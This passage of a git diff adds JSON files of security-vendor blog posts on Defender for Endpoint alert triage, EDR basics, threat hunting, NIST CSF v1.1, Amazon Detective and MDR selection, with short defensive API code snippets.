In short, Defender for Endpoint made it really easy for us to get to our standard of investigative quality and response time without requiring the heavy lift to get the features we needed upfront. So what is Microsoft Defender for Endpoint? Microsoft Defender for Endpoint is an enterprise endpoint security product that supports Mac, Linux and Windows operating systems. There are a ton of cool things that Defender for Endpoint does at an administrative level (such as attack surface reduction and configurable remediation) however from our vantage point, we know it best for its detection and response capabilities. Defender for Endpoint is unique because not only does it combine an EDR and anti-virus (AV) detection engine into the same product, but for Windows 10 hosts this functionality is built into the operating system (removing the need to install an endpoint agent). With an appropriate Microsoft license, Defender for Endpoint and Windows 10 provide out of the box protection without the need to mass-deploy software or provision sensors across your fleet. What is EDR and how do these tools help us When we integrate with an endpoint detection and response (EDR) product, our goal is to predict the investigative questions that an analyst is going to ask and then have the robot perform the action of getting the necessary data from that tool. This frees up our analyst to make the decision . We think Defender for Endpoint provides the right toolset for helping us easily reach that goal via its API. Why Microsoft Defender for Endpoint is the best Thanks to Defender for Endpoint\u2019s robust APIs, we augmented its capability to provide upfront decision support to our analysts that arms them with the answers to the basic investigative questions that we ask ourselves with every alert. To find these answers, there\u2019s a few specific capabilities of Defender for Endpoint that we tap into that allow us to pull this information into each alert. This way, our analysts don\u2019t need to worry about using the tool, but instead, get to focus on analyzing the rich data that it provides: Advanced hunting database Prevalence information Detailed process logging AV actions Like we mentioned, Defender for Endpoint is an amazing investigative tool out of the box, but it only gets better once you start peeking under the hood. Our favorite for Endpoint feature? The API. Here at Expel, robots are our friends. They help us with decision support. This is what enables our analysts to focus on making decisions rather than worrying about how to use 30+ different technologies to gather the data we need to answer investigative questions. To be effective, our robots must not only be good at collecting the data needed but preparing it for interpretation as well. Therefore our robots aren\u2019t just good at collecting data, they also translate it into a format our analysts can easily work with and is consistent across multiple technologies. With Defender\u2019s rich API, we have an opportunity to replicate the manual scoping actions our analysts would take in the console and perform them automatically in our own platform. Now that we\u2019ve written our love letter to Defender for Endpoint, we\u2019ll show you a real example of how we use this tool to triage an alert. Triaging an alert using Microsoft Defender for Endpoint First things first: here\u2019s how we break down an alert. At a high level, we\u2019re looking to answer five basic investigative questions: What is it? Where is it? How did we detect it? 
How did it get there? When did it get there? Defender for Endpoint\u2019s features help us easily answer these questions. Here\u2019s an example of what a Defender for Endpoint alert looks like when it initially comes through the Expel Workbench: Initial lead of suspicious commands Here\u2019s what we know What is it? Suspicious net commands being run by this user Where is it? One host How did we detect it? EDR alert \u2013 execution of suspicious commands What we don\u2019t know, how and when did it get here Now to answer the money questions. We need to ask ourselves the last two of our investigative questions ( How did it get there? When did it get there? ) to understand how we will need to proceed in our investigation. And, as with any investigation, they will require additional data to answer. An analyst\u2019s measure of a good EDR platform will always be biased towards whether or not the data they need is available, easy to obtain and to understand. In our experience, Defender for Endpoint does an excellent job of anticipating these questions and providing easy access to detailed process information that allows an analyst to quickly and confidently make decisions. To highlight this, let\u2019s attempt to answer How did it get there? using some of the data provided to us with the Defender for Endpoint alert. Our favorite way to answer this? The Alert Process tree. Process tree of activity flagged in the alert As analysts, we love to see a nice process tree (like the one you see above). Being able to visualize the lineage of a process is extremely helpful, especially when time is of the essence. Defender for Endpoint presents us with a detailed hierarchy of the processes involved in an alert, marking anything it believes to be suspicious with a yellow lightning bolt. By looking at the process tree, we can easily identify that the suspicious net commands spawned from the parent process \u201chttpd.exe.\u201d Why is this detail relevant? This is common behavior associated with webshells from a remote attacker. By knowing this, we now have evidence to suggest an anomalous process relationship and likely an incident. With a suspected webshell on the brain, now we have a little bit of clarity on how these suspicious commands were executed. But two important questions still remain: How did this webshell get here? When did the webshell first enter the environment? Again, these are high-level questions and an experienced analyst is naturally going to attempt to identify the sources and frequency of the webshell interaction as well. But regardless, the Timeline feature of the Incident pane allows us to answer all of these. Check out this output when we search for the process \u201chttpd.exe\u201d on the alerted host. Timeline view to filter network connections from the httpd.exe process We can answer When did it get there? by filtering network connections, helping us clearly identify network connections related to the suspicious \u201chttpd.exe\u201d activity and determining the time they first started. More than likely, these connections are the Command and Control we would expect from webshell interaction; containing the \u201cnet\u201d commands that we were alerted to initially. Seeing the whole picture With just a few tools in the Defender for Endpoint console, we can easily scope this activity and answer all five of our initial investigative questions. What is it? Reconnaissance commands being executed by an attacker Where is it? One host (Web application host) How did we detect it? 
EDR alert \u2013 execution of suspicious commands How did it get there? A webshell deployed through an application vulnerability When did it get there? A few hours prior to our original alert How do we use Defender\u2019s features to our advantage? If you asked a robot what its job at Expel is, it would likely respond in a JSON blob. JSON is great for transferring and formatting data in an efficient way, but it\u2019s not great for a human to read. Therefore, outside of just collecting the data, our robots are also responsible for making this data ready for interpretation by an analyst in a format that is readable and consistent. So how do our robots pull this off? Well, our robots speak API. It all starts with them being able to ask some very simple questions of Defender for Endpoint. We\u2019ve found that Defender for Endpoint has a rich API that allows us to automate our entire triage process. Let\u2019s take a look at what this looks like with our lead alert. Defender for Endpoint Alert decision support Prevalence Information Where is it? As an analyst, this is probably one of the first (and most powerful) questions you can ask yourself in an investigation. The lower the prevalence, the more likely you\u2019re looking at something out of place. The way we do this with Defender for Endpoint is by normalizing the process arguments that were alerted on and querying for them in the Advanced Hunting Database. As you can see above, our analysts immediately know that in the past seven days these commands are completely unique compared to the one host we\u2019re already investigating. We can see this by looking at how common these process arguments are in the environment. We also do this with the normalized file path to help identify whether the alerted activity is being executed out of an abnormal location or is simply a commonly installed binary in the environment, by showing us everywhere the file is seen. With this information, we can easily spot legitimate binaries in abnormal locations, or spoofed binaries that are executing out of legitimate directories. Defender for Endpoint Alert decision support Auto-Timeline Generation Your next logical question as an analyst is usually: How did it get there? We anticipate this and provide a timeline of the activity that occurred in a five-minute window around the time of the alert. Since this comes with the alert, there\u2019s no wasting time learning a query language, logging into the console, waiting for the query to run and parsing the data. All in all, we save at least five to 10 minutes per alert when this data is retrieved and interpreted by our robot. This data comes back in a normalized CSV format so an analyst can easily open and filter that data in Excel. Below, you\u2019ll see an example of an automatic timeline generated for the host involved in the alert. Defender for Endpoint Decision support Our Timeline format is very simple, and emulates the format in which we keep our master incident Timelines. That way we can easily take data from multiple sources and combine them into a master Timeline that tracks an incident across multiple hosts, users and organizations (note that columns are redacted). Timeline acquired through our robots in CSV format AV Actions One of the greatest features of Defender for Endpoint is its configurable remediation policies. As defenders, we usually want to know pretty early on whether or not a specific file was allowed to execute, or was blocked/ended by Defender for Endpoint at runtime.
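To give a flavor of what "our robots speak API" looks like in practice, here is a rough sketch of the prevalence lookup described above, run against the Defender for Endpoint advanced hunting API. The endpoint, table and column names follow Microsoft's public documentation at the time of writing; treat the exact query and response handling as assumptions and verify against the current docs.

```python
# Rough sketch: ask "how many devices ran this exact command line in the last 7 days?"
# The endpoint and the DeviceProcessEvents schema follow Microsoft's public advanced
# hunting API docs; verify both before relying on this.
import requests

API_URL = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"


def command_line_prevalence(token: str, command_line: str) -> int:
    """Return the count of distinct devices that ran a command line in the past week."""
    # In production you'd escape or parameterize command_line instead of inlining it.
    query = f"""
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where ProcessCommandLine == "{command_line}"
    | summarize Devices = dcount(DeviceName)
    """
    resp = requests.post(
        API_URL,
        headers={"Authorization": f"Bearer {token}"},
        json={"Query": query},
        timeout=30,
    )
    resp.raise_for_status()
    results = resp.json().get("Results", [])
    return results[0]["Devices"] if results else 0
```

A result of one device (the host already under investigation) is exactly the "completely unique" signal described above.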
Our robots reach out to get us that context on each alert, and alert us to what Defender for Endpoint action was applied to the suspicious activity (if any) so that we can make smarter decisions about our response. For example, no one wants to spin up an incident for a blocked stage one download, but if the second stage was allowed to execute \u2013 let\u2019s call in the troops. In the example below we see that a file matching a signature for the Skeeyah trojan was identified and blocked at runtime. Before having to prove execution, we now know the scope is limited to simply answering one question ( How did it get here? ) rather than a bunch of post-exploitation questions right off the bat: What other actions happened as a result? What C2 did it communicate with? How many other machines are infected? We save a lot of time knowing this up front as there is no ambiguity on the action taken by the tool or having to parse detailed logs to find this information. Defender for Endpoint Decision Support Putting it all Together The decision support Defender for Endpoint enables us to generate is powerful because it allows us to become specialists at analysis rather than specialists of a specific technology. Don\u2019t get us wrong, there are always benefits to knowing the tool. But a carpenter building a house isn\u2019t usually the same person who forged the hammer. Decision support allows us to be flexible in the tools that we\u2019re using but also to be consistent in the response we provide to our customers. By standardizing the investigative questions and building our robots to answer those questions automatically, we can uplevel the capability of our analysts. Defender for Endpoint provides a platform that allows our analysts to quickly and accurately answer important questions during an investigation. But most importantly, having these capabilities emulated in the API allowed us to build on top of the Defender for Endpoint platform to be more efficient in our goal of providing high-quality detection and response across multiple organizations. Have questions? Let\u2019s chat ." +} \ No newline at end of file diff --git a/what-s-endpoint-detection-and-response-edr.json b/what-s-endpoint-detection-and-response-edr.json new file mode 100644 index 0000000000000000000000000000000000000000..08da0c980f2e88748c1ded606deecde98d68e36d --- /dev/null +++ b/what-s-endpoint-detection-and-response-edr.json @@ -0,0 +1,6 @@ +{ + "title": "What's endpoint detection and response (EDR)?", + "url": "https://expel.com/blog/whats-endpoint-detection-and-response-edr/", + "date": "Dec 6, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s endpoint detection and response (EDR) and when should you care? Security operations \u00b7 3 MIN READ \u00b7 GRANT OVIATT \u00b7 DEC 6, 2017 \u00b7 TAGS: EDR / Selecting tech / Tools Perhaps you\u2019ve heard AV is dead, or maybe someone tossed around the EDR acronym in a meeting and you had to Google it. You might even just be skeptical of what an EDR can do. In any case, the constant drumbeat of new products makes it harder than ever to keep current with security solutions. It\u2019s easy to become desensitized to all of the market hype. In this blog post, I\u2019m going to try to cut through the hype and explain what EDR products can do for you. If you\u2019ve ever been skeptical of EDR vendor promises, but curious if they can solve real security problems\u2026 you\u2019ve come to the right place. What is EDR? 
Endpoint detection and response (EDR) tools are a new(ish) category of security solutions. They require you to install an agent on each endpoint. In return, you\u2019re able to record and store endpoint system behaviors and events. These events typically include tracking processes, registry alterations, file system activity and network connections on all hosts where the agent is installed. Security teams can use this event stream to detect and investigate suspicious activity that occurs in their environment. What are the three most important things an EDR tool will do for me? Give you visibility into behaviors, not just indicators of compromise Attacker tools aren\u2019t stagnant, so why should your detections be? EDR solutions enable you to detect more than just a filename or hash match by providing a simple way to collect, store, and search host-based events. Changing a single byte in a file can ruin an indicator of compromise. But the broader techniques that lead to a compromise change far less frequently. EDR products use the events they collect to identify suspicious process relationships, unusual network connections, potential credential theft and lots of other behaviors that can help you identify a potential compromise faster. Most EDR products even allow you to inject your own expertise into the device by augmenting its out-of-the-box detection behaviors with your own rules. Answer security questions at scale Ever wonder how many hosts in your environment are using a particular piece of vulnerable software? Or, perhaps what hosts have gone to a particular known-bad domain? Has an investigation ever left you asking \u201cIs this activity normal?\u201d These are all questions you can quickly answer when you have an EDR solution to query collected file, network, and process events across your environment. And they\u2019re not just valuable when you\u2019re responding to an incident. They also arm you with valuable data you can use for proactive threat hunting. Help you respond faster It\u2019s probably obvious that you can respond faster when you can easily get additional context on alerts by searching events from all your endpoints. But what happens when there\u2019s a specific file, registry key or process that needs closer inspection \u2014 beyond the event stream? Luckily, most EDR solutions eliminate the need to physically chase down the laptop or server in question by empowering you with remote file acquisition, file listing, registry listing, and in some cases, even memory analysis capabilities. \u2026and a few things EDR tools won\u2019t do Be a complete replacement for your antivirus While antivirus and EDR solutions are slowly converging, they\u2019re still two distinct offerings. Traditional AV blocks known-bad indicators that commonly plague enterprise environments. EDR solutions complement that by giving you a way to perform root cause analysis on specific incidents, identify all infected hosts, and even contain them in some cases\u2013 but most won\u2019t prevent compromise in the first place. Be the last detection solution you\u2019ll ever buy While EDR tools provide tremendous visibility and insight into your network, they aren\u2019t substitutions for your IDS/IPS, next-gen firewalls or good old-fashioned security policies. You\u2019ll get a ton of value from your ability to detect and respond rapidly to threats, but don\u2019t mistake them for being a comprehensive solution. 
A substitute for having an investigative process and mindset The conclusions you take away from your EDR tool will be directly proportional to the expertise of the analysts using it. EDR tools will collect, store and make events easy to search \u2014 but a human still needs to interpret the events in a meaningful way. In short, the benefits of an EDR can be entirely lost on a team that isn\u2019t prepared to use them. Train your team, hone your process , and your EDR tool will become an invaluable asset. Should you buy an EDR? So, now that we\u2019ve covered what EDR tools are (and aren\u2019t) how do you know if you\u2019re ready to take the plunge and buy one? Well\u2026 if these three points describe you\u2026 you should definitely take a look. You want to up-level your detection and investigative capabilities You understand that an EDR tool isn\u2019t going to replace your AV solution You\u2019re prepared to invest the time and expertise required to use an EDR tool effectively" +} \ No newline at end of file diff --git a/what-s-hunting-and-is-it-worth-it.json b/what-s-hunting-and-is-it-worth-it.json new file mode 100644 index 0000000000000000000000000000000000000000..835f291b3c9f197e5c96a84d77817d28611a44c4 --- /dev/null +++ b/what-s-hunting-and-is-it-worth-it.json @@ -0,0 +1,6 @@ +{ + "title": "What's hunting and is it worth it?", + "url": "https://expel.com/blog/whats-hunting-and-is-it-worth-it/", + "date": "Dec 21, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s hunting and is it worth it? Security operations \u00b7 4 MIN READ \u00b7 BRYAN GERALDO \u00b7 DEC 21, 2021 \u00b7 TAGS: Cloud security / MDR The value of hunting is a source of ongoing conversation and debate within the security industry. For some, hunting is a no-brainer, while others have intentionally delayed the adoption of this more novel approach to security. Why the debate? A few reasons. First, there are a lot of misconceptions and conflicting views about what hunting is and how it should be implemented. That\u2019s because there isn\u2019t an industry-adopted definition of hunting. Then there are the limited expertise, competing priorities, and organizational tensions that impact security teams\u2019 ability to adopt an effective hunting program. Not to mention the budget constraints that exacerbate the issue by forcing some orgs to rely on the bare minimum to secure their infrastructure \u2013 either delaying the adoption of a hunting program or implementing one that\u2019s sub-optimal. Expel has taken a side in this debate. In this blog post, I\u2019m going to explain what hunting is, the value it provides, and share how we use hunting here at Expel. What\u2019s hunting? TL;DR: Hunting is the act of proactively looking for threats and/or anomalous activity in an environment that may have been missed by your security tools. But, like I mentioned, you won\u2019t find an industry agreed-upon definition of hunting today, which can lead to misunderstandings about what hunting is and who does it. For example, hunting efforts focused strictly on retrospective data analysis using known indicators of compromise (IOCs) after a large-scale attack or hunting services that are primarily automated are often marketed as a comprehensive hunting solution. But they often fall short on the scope, visibility, and reach you can or should expect from proactive hunting. At its core, hunting is scientific, rooted in the practice of setting up an experiment to test a hypothesis. 
Hunting \u2018experiments\u2019 are based on both known and unknown attacker behaviors. Hunting \u2018hypotheses\u2019 are based on the assumption that bad actors slipped past your detections. Hunting \u2018tests\u2019 involve analyzing a large set of data (your raw logs) over a period of time (30 days for us) and focus on abnormal behaviors and patterns. Hunting is complex. It requires experienced talent, a dash of creativity, and effective tools. It also requires the time and space to effectively implement and maintain a threat hunting program. This can prove challenging for many orgs, especially those still struggling to understand the value or benefits of hunting. On top of that the low number of results typically found in a hunting exercise is a good sign for secure environments, but can lead to a low perceived value of hunting. Despite these challenges, security-forward companies have recognized the growing importance of threat hunting, and those who have implemented hunting programs find themselves ahead of the next attack instead of waiting for it. The benefits of hunting In our experience, there are characteristics of a mature hunting program that bring numerous benefits to organizations, including but not limited to: Helping uplift existing SOC detections by focusing on finding behaviors that are missed by existing security tools. Over time, enhancing existing tools with new and novel detection patterns. Further validations for the existence of an incident. Improving the overall quality of existing threat intelligence (like data) by helping shape threat intelligence research efforts. Helping to alleviate management anxieties by providing greater coverage of monitoring and analysis throughout the infrastructure. With Expel, for example, we\u2019ve enabled several enterprise customers to move beyond simply focusing on IOC-based hunts in one environment (which is still important) to extending their threat hunting coverage across their environment with a larger, diverse set of hunting techniques. From our perspective, the benefits of hunting are many. Some of our favorites include: Attention to both known and unknown threats. Reduced attacker dwell times (time spent undetected in the environment) Faster time to containment. Minimized risk of lateral movement, spread, and exfiltration. A full view (beyond threats) that helps you better understand your environment And we\u2019re not the only ones that feel that way. An increased number of industry experts, research studies, and reports mention or highlight the benefits of hunting. NIST\u2019s latest publication (Rev5) of NIST SP 800-53 acknowledges the usefulness of hunting to help identify evolving threats and, for the first time ever, introduced a control for threat hunting in section RA-10. This change tells us that orgs are starting to understand the significance of threat hunting. Yet many orgs struggle with finding the talent, time, or resources to hunt full-time, which makes prioritizing threat hunting especially difficult. Why Expel loves hunting Here at Expel , we believe there\u2019s another potential benefit to hunting that\u2019s frequently overlooked. Beyond identifying evolving threats, hunting is great for gaining more visibility into how your infrastructure (on-prem and/or cloud) is working (or not working). We consider this one of the most valuable features of our hunting service and include it in our hunt findings report as an added bonus. 
Expel reports this information in a dedicated \u2018Insights\u2019 section of our hunt findings report. We examine our customers\u2019 workings and identify areas that need attention, like misconfigured tools or other unnecessary operational costs they\u2019re incurring. We also use these insights in a few other ways. For one, insights help set a baseline understanding of what\u2019s going on in your environment. Second, they can help break down communication silos between teams in your org to build a common understanding of your infrastructure. Finally, insights highlight important operational information your team should be aware of, ranging from security to compliance to operational issues that are increasing costs, like large unidentified elastic compute cloud (EC2) instances. And while these insights give you a better understanding of your infrastructure, they also enhance our unique context for our customers\u2019 orgs that we then use to improve our detection strategies for their specific environments. So, is it worth it? Research shows that hunting is quickly growing in importance and becoming a staple of a strong security strategy. Expel\u2019s chosen \u2018side\u2019 is this: we fully believe in its benefits to not just identify evolving threats, but also to give you a better fundamental understanding of your environment. The next time someone asks if it\u2019s worth it, here\u2019s the real value of hunting: It\u2019s the best way to stay ahead, mitigate your overall exposure (for example, reduce dwell time which is the time an attacker spends undetected in your environment), and give you a stronger chance of catching bad actors that have slipped past your security tools. Hunting enhances the visibility of your environment and provides an extra layer of protection that can prevent catastrophic damage. But keep in mind that developing a hunting strategy and capability is a time-consuming investment that requires a lot of resources. And even mature security teams might need threat hunting support to hunt efficiently and effectively. Feels familiar? If you\u2019re currently evaluating a hunting service (or thinking about it after reading this blog post), check out this impact report for buyers." +} \ No newline at end of file diff --git a/what-s-new-in-nist-cybersecurity-framework-v1-1.json b/what-s-new-in-nist-cybersecurity-framework-v1-1.json new file mode 100644 index 0000000000000000000000000000000000000000..34003d19dadd0cf76b12797a38446326a6b1cbb1 --- /dev/null +++ b/what-s-new-in-nist-cybersecurity-framework-v1-1.json @@ -0,0 +1,6 @@ +{ + "title": "What's New in NIST Cybersecurity Framework v1.1", + "url": "https://expel.com/blog/whats-new-in-nist-csf/", + "date": "Apr 26, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s new in the NIST Cybersecurity Framework (CSF) v1.1 Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 26, 2018 \u00b7 TAGS: Framework / NIST / Overview / Planning On April 16, 2018, NIST published Framework for Improving Critical Infrastructure Cybersecurity Version 1.1 \u201cWhere do I start?\u201d It\u2019s a common question for organizations that are trying to get their arms around the sprawling issues of cybersecurity and risk management. For most, this question eventually leads them to the NIST Cybersecurity Framework (CSF). Since it was published in 2014, it has been a frequent starting point. It\u2019s not perfect, but it has provided a common language and structure for discussing and improving security. 
Thousands of organizations are now using the framework. And that\u2019s a good thing. It\u2019s safe to say we\u2019re fans of the NIST CSF here at Expel. We use it to help manage our own cyber risk and to help communicate our needs and plans to our customers and suppliers. We\u2019ve created a \u201cHow to get started\u201d guide and free NIST CSF self-scoring tool that lets you chart your \u201cas is\u201d and \u201cto be\u201d states using the framework in a couple of hours \u2014 we even offer an interactive version of it for our customers within Expel Workbench.. If you\u2019re looking to get started with the framework it should help quite a bit. Now, after 4 years, many comments, questions, and suggestions, NIST has officially released version 1.1 of the Cybersecurity Framework. Not much has changed between draft 2 of v1.1, which was published for comment in December 2017 and the final release. Version 1.1 is still compatible with version 1.0, so the changes to the framework aren\u2019t earth shattering. They\u2019re largely refinements based on feedback from the community. In case doing a \u201cstare-and-compare\u201d of the original and updated frameworks isn\u2019t your idea of fun, I\u2019ve highlighted three important changes below. 1. Assess yourself first \u2026 then measure It has always been difficult for some organizations to use the framework because NIST didn\u2019t provide clear guidance on exactly what to use it for. While the initial Framework talked about tiers of implementation, there wasn\u2019t much discussion on how to actually grade yourself or other ways to measure how well you were doing from a cybersecurity perspective. It was brand new back in 2014 so that makes sense. The updated version fills in some of those gaps. Specifically, Section 4, which used to be called \u201cMeasuring and Demonstrating Cybersecurity\u201d has been re-christened \u201cSelf-Assessing Cybersecurity Risk with the Framework.\u201d While both names are equally dry (hey\u2026what do you expect from a standards body), they cut to the core of how to operationalize the framework. Self assessments are key to understanding your \u201cas is\u201d state and formulating a plan for improving your organization\u2019s cybersecurity. In fact, they\u2019ve been one of the framework\u2019s big successes. By focusing Section 4 on self-assessment, NIST is making sure organizations that are new to the framework focus on one of the framework\u2019s primary use cases. 2. Supply chain risk management (SCRM) \u2014 now with real guidance It\u2019s no secret that supply chain partners are often the soft underbelly for attackers looking for a way in. But answers for how to protect the supply chain are harder to come by. Past versions of the NIST framework highlighted SCRM as an important component of a cybersecurity program. But they didn\u2019t really say anything else. The new version of the framework adds a lot more detail and integrates SCRM with the rest of the framework. It feels a lot more complete. So, if you\u2019re one of those people who\u2019ve been beating the SCRM drum for three\u2026or\u2026five\u2026or\u2026ten years, you\u2019ll find new ammunition to beat the drum even louder. There are several pages on managing risks in your supply chain through third party assessments, targeted security controls and holding suppliers accountable. 3. 
External participation \u2013 when and how you should get outsiders involved The final notable change I want to call out relates to when and how you should get outside parties involved in your program. As a quick refresher, NIST defines four tiers of maturity. It starts with Tier 1, which NIST charitably calls \u201cPartial\u201d. This includes organizations that only deal with cyber risk when they\u2019re forced to. Fast forward to Tier 4 (aka \u201cAdaptive\u201d) organizations and you\u2019re looking at risk management machines. NIST ranks each tier according to risk management processes, integrated risk management programs and\u2026you guessed it\u2026external participation. But previous versions of the framework didn\u2019t give the reader much to go on when it came to external participation. There was a sentence or two describing what was appropriate for that tier. But not enough to build into your program. The new definitions are much more complete. They include discussion on external communication, the broader community and guidance on how to interact with supply chain stakeholders. \u2014 Overall, version 1.1 of the NIST framework feels a lot more complete to me than version one. That\u2019s not surprising given we\u2019ve had three years to digest and use it. In addition to the practical experience, our understanding of cyber risk has continued to evolve. If you\u2019ve thought about using the NIST framework before but felt it was too daunting, now might be a time to take another look. If, on the other hand, you\u2019re already using NIST I\u2019d suggest taking a look at the three sections I\u2019ve highlighted above to see if they can help focus your implementation by turning some of the more theoretical aspects of the NIST framework into tangible things you can go execute on. Either way, I recommend checking out our blog post, \u201cHow to get started with the NIST Cybersecurity Framework (CSF).\u201d It\u2019s a (hopefully) easy-to-understand overview that we\u2019ve written to help people put the NIST CSF into practice. We\u2019ve also updated our NIST CSF self-scoring tool to reflect tweaks to the Supply Chain Risk Management and Identity Management and Access Control subcategories. If you used the previous version of our tool, there\u2019s no need to re-do you work. The changes are all small modifications and don\u2019t change the overall approach." +} \ No newline at end of file diff --git a/where-does-amazon-detective-fit-in-your-aws-security.json b/where-does-amazon-detective-fit-in-your-aws-security.json new file mode 100644 index 0000000000000000000000000000000000000000..bdc5b74f74c106908b4c60d547949c8b793d4707 --- /dev/null +++ b/where-does-amazon-detective-fit-in-your-aws-security.json @@ -0,0 +1,6 @@ +{ + "title": "Where does Amazon Detective fit in your AWS security ...", + "url": "https://expel.com/blog/amazon-detective-fit-in-aws-security-landscape/", + "date": "Dec 3, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Where does Amazon Detective fit in your AWS security landscape? Security operations \u00b7 3 MIN READ \u00b7 MATT PETERS AND PETER SILBERMAN \u00b7 DEC 3, 2019 \u00b7 TAGS: Cloud security / How to / Managed security / Tools Amazon Web Services (AWS) has rolled out some really nifty security capabilities over the last couple of years. Amazon Detective is AWS\u2019 latest innovation. 
If you run workloads on AWS, then you\u2019re probably already familiar with some of the other AWS-native security tools like Amazon GuardDuty, AWS Security Hub and Amazon Macie. So where does Amazon Detective fit into this puzzle? What is Amazon Detective? Think of Amazon Detective as investigative support for AWS GuardDuty alerts. AWS announced the public preview program for Amazon Detective at re:Invent 2019 and Expel is one of the first managed detection and response (MDR) providers to support it. We\u2019re thrilled to be an early service partner for Amazon Detective! AWS CISO Steve Schmidt talks about Amazon Detective during re:Invent 2019; Expel is named as a service partner. In practice, Amazon Detective makes it easier for AWS customers and their MDR providers to analyze, investigate and quickly identify the root cause of security findings or suspicious activities. The service automatically extracts, distills and organizes data from VPC Flow Logs, AWS CloudTrail and Amazon GuardDuty, and creates an interactive view with contextual information that summarizes resource behaviors and interactions observed across your AWS environment. Amazon Detective can help speed up investigations for supported GuardDuty findings. For example, if you receive a GuardDuty finding of suspicious VPC flow activity, Amazon Detective will now present you with relevant information about the IPs involved in that GuardDuty finding. This speeds up the time to triage an alert (and likely cuts response time too). Amazon Detective might also prompt you (or your security analysts) with questions you should be thinking about answering. This fits nicely with how Expel thinks about the analyst mindset, and how we train our analysts to answer questions instead of following specific pre-set run books. Where does Amazon Detective fit in your AWS security strategy? If you\u2019re new to AWS and are looking for a simple this-tool-does-that primer, then here\u2019s a good place to start. At Expel, many of our customers run workloads on AWS and our analysts work with alerts from these environments on a regular basis to investigate suspicious activity. We\u2019ve published several how-to\u2019s for popular AWS security tools, along with some tutorials on fixing common cloud security issues. Be sure to check out: Making sense of Amazon GuardDuty alerts Following the CloudTrail: Generating strong AWS security signals with Sumo Logic How to find Amazon S3 bucket misconfigurations and fix them ASAP When it comes to securing the cloud, Amazon provides a panoply of solutions which can be a bit dazzling (and different from what you\u2019d find in a traditional on-prem security stack). We\u2019ve found that by mapping these to a set of jobs that our analysts do, it provides a helpful framework for thinking about them. Broadly, we bucket the AWS offerings into three categories. Why we\u2019re excited about Amazon Detective Amazon Detective is helpful addition to AWS\u2019 suite of security tools. At Expel, we believe that quality forensic investigations require context and decision support, and that\u2019s exactly what Amazon Detective provides. A security alert alone doesn\u2019t tell you much, but the context surrounding it is essential to figuring out whether you\u2019ve got a false positive or a legitimate issue on your hands. The right historical details and the right behavior analytics are what turns any old alert into the lead that cracks the case. 
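If you want to see the raw material Detective works with, here is a minimal boto3 sketch that pulls recent GuardDuty findings, the same findings Detective enriches with VPC Flow Log and CloudTrail context. This uses the standard GuardDuty API rather than Amazon Detective itself, and the sort attribute and returned fields are illustrative choices.

```python
# Minimal sketch: list recent Amazon GuardDuty findings, i.e. the alerts that
# Amazon Detective builds its interactive context around.
import boto3


def recent_guardduty_findings(region="us-east-1", max_results=10):
    gd = boto3.client("guardduty", region_name=region)
    findings = []
    for detector_id in gd.list_detectors()["DetectorIds"]:
        finding_ids = gd.list_findings(
            DetectorId=detector_id,
            SortCriteria={"AttributeName": "updatedAt", "OrderBy": "DESC"},
            MaxResults=max_results,
        )["FindingIds"]
        if finding_ids:
            findings += gd.get_findings(
                DetectorId=detector_id, FindingIds=finding_ids
            )["Findings"]
    return [(f["Type"], f["Severity"], f["Title"]) for f in findings]
```

Each finding carries its own resource and service details; the value Detective adds is organizing the surrounding activity so you don't have to pivot by hand.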
For example, if it\u2019s 2am and you\u2019re looking at an anomalous login, the context around that user\u2019s login is helpful \u2014 is this a real problem, or is Pat on sabbatical in Spain? Put your cloud security skills to the test Whether or not Amazon Detective has a place in your security strategy right now, it\u2019s easy to test out the AWS security tools you\u2019re already using in staged environments. Once you\u2019re feeling confident using the AWS-native security tools, put your team\u2019s detection skills to the test by creating a threat emulation exercise for AWS . This is something we do often at Expel. Simulating realistic attacks in cloud environments helps our analysts build muscle memory and prepares them to act quickly and correctly when something bad happens. Like this idea but not sure how to get started with creating your own? We\u2019ve got an entire post that walks you through the process of creating a cloud-based threat emulation exercise . We even threw in a sample scenario for you, complete with instructions on how to simulate the attack in your AWS environment . Enjoy!" +} \ No newline at end of file diff --git a/which-flavor-of-mdr-is-right-for-your-org.json b/which-flavor-of-mdr-is-right-for-your-org.json new file mode 100644 index 0000000000000000000000000000000000000000..d550f1ce8b884579459b982b3c55802948969b6e --- /dev/null +++ b/which-flavor-of-mdr-is-right-for-your-org.json @@ -0,0 +1,6 @@ +{ + "title": "Which flavor of MDR is right for your org?", + "url": "https://expel.com/blog/which-flavor-of-mdr-is-right-for-your-org/", + "date": "Mar 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Which flavor of MDR is right for your org? Security operations \u00b7 2 MIN READ \u00b7 MIMI JACOBS \u00b7 MAR 30, 2023 \u00b7 TAGS: MDR At best, the managed detection and response (MDR) landscape is multi-faceted and complicated; at worst, it\u2019s downright confusing and frustrating to navigate. Further compounding the challenge of determining the best approach to MDR for your organization is the simple fact that it\u2019s unique. Your mix of security tools, your business-driven risk requirements, and the makeup of your security team are just some of the factors that play a role in finding and implementing the type of MDR that best meets your company\u2019s business and technical requirements. The fact remains that MDR can (and perhaps will) play an important role in your security strategy . As many orgs struggle to find the right people to fill roles, MDR is already helping bridge the gap\u2014and that trend is set to continue. According to Gartner, \u201cby 2025, 60% of organizations will be actively using remote threat disruption and containment capabilities delivered directly by MDR providers, up from 30% today.\u201d So if you\u2019re considering an MDR solution, now\u2019s a great time to learn more. Luckily, Gartner recently released its 2023 Market Guide for Managed Detection and Response Services , providing a comprehensive analysis of the MDR market, a look at its evolution, representative players in the space, and overall recommendations. We believe the Gartner analysts who authored the Market Guide do a great job providing some context before you begin your MDR search: MDR buyers must focus on the ability to provide context-driven insights that will directly impact their business objectives, as wide-scale collection of telemetry and automated analysis are insufficient when facing uncommon threats. 
